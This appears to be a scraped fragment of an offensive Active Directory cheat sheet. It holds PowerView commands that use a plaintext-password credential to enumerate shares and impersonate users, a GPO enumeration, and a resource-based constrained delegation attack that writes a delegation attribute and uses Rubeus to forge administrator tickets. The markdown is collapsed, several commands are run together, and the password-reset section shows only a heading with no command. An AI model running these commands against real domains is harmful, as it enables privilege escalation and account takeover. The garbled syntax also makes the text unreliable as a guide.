$cred = New-Object System.Management.Automation.PSCredential "BURMAT\John.Smith", $(ConvertTo-SecureString "Spring2020!" -AsPlainText -Force);
Find-DomainShare-ComputerName fs01.burmat.local -Credential $cred -ComputerDomain burmat.local -CheckShareAccessInvoke-UserImpersonation-Credential $cred# now we can read the directory impersonating another user if permissions exist:dir \\fs01.burmat.local\Private```### Enumerate GPO's```powershell"{7EA15487-7F5B-4CE3-C029-CEBE6FFE6D47}"|Get-DomainGPO
Reset Domain User Password
If you own the owner of another AD user object (WriteOwner, WriteDACL, GenericWrite, Owner, etc), you can reset the password with ease:
## we can write our delegation attribute to the DC with the following:$UserSid =Get-DomainUser svc_burmat -Properties objectsid | Select -Expand objectsid;$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($UserSid))";
$SDBytes =New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes,0);Get-DomainComputer websrv.burmat.local |Set-DomainObject-Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes};## use rubeus to forge tickets as administrator accountsrubeus.exe s4u /user:svc_burmat /ticket:doIFFDCCBRCg..SNIP.. /impersonateuser:administrator /msdsspn:cifs/websvr.burmat.local /ptt;